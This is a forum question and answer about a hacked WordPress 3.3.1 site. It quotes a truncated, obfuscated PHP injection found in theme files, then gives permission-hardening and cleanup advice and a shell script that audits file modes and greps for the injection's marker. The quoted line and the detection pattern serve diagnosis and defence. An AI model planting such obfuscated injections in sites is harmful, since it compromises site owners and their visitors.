I got this code on an updated WordPress site.
WordPress 3.3.1, and all plugins up to date.
Plugin list: custom-contact-forms, google-maps-for-wordpress & seo-ultimate.
Some of the affected theme files were CHMOD 644. Every time I leave a file with CHMOD 777 this starts, but it does not affect only 777 files; it also affects 644 files.
The code is as follows:
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioD............okBoVSjr = $eva1tYlbakBcVSir;} ?>
So, how can I prevent this, and what does the code do?
No WordPress file should ever be 777; the maximum permissions are 755 for folders and 644 for files. See Hardening WordPress « WordPress Codex.
Your hosting account - probably inexpensive shared hosting - is probably the hack vector. Tell your host; possibly find a more secure host. Change all passwords. Scan your own PC.
To completely clean your WP install and hosting account, see FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress.
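The permission ceiling given in the answer (755 folders, 644 files) and the injected line quoted in the question can both be checked from a shell on the host. This is an added example, not part of the original posts; the function names and the marker regex (built from the visible `@error_reporting(0); if (!isset($eva1` prefix) are assumptions.

```shell
#!/bin/sh
# Added example: audit a WordPress tree for over-permissive modes and for
# the injected line shown in the question. Function names are hypothetical.

# Assumed marker: the visible start of the injected code. The payload itself
# is truncated on the page, so only this prefix is matched.
EVA_MARKER='@error_reporting\(0\);[[:space:]]*if[[:space:]]*\(!isset\(\$eva1'

# List directories more permissive than 755 and files more permissive than 644.
audit_wp_perms() {
    # Directories: any group/other write bit exceeds 755.
    find "$1" -type d \( -perm -020 -o -perm -002 \) -print
    # Files: any execute bit or group/other write bit exceeds 644.
    find "$1" -type f \( -perm -100 -o -perm -010 -o -perm -001 \
        -o -perm -020 -o -perm -002 \) -print
}

# List PHP files containing the injected marker, whatever their mode is.
# Returns 0 when at least one file matches, 1 when none do.
find_eva_injection() {
    hits=$(find "$1" -type f -name '*.php' \
        -exec grep -lE "$EVA_MARKER" {} + 2>/dev/null) || true
    [ -n "$hits" ] && printf '%s\n' "$hits"
}

# Stand-alone use: sh audit.sh /path/to/wordpress
if [ $# -gt 0 ]; then
    echo "== Modes above 755 (dirs) / 644 (files) =="
    audit_wp_perms "$1"
    echo "== PHP files carrying the injected marker =="
    find_eva_injection "$1" || echo "(none found)"
fi
```

The two checks are independent: as the question notes, files at 644 were also modified, so a clean permission audit does not mean the tree is free of the injected line.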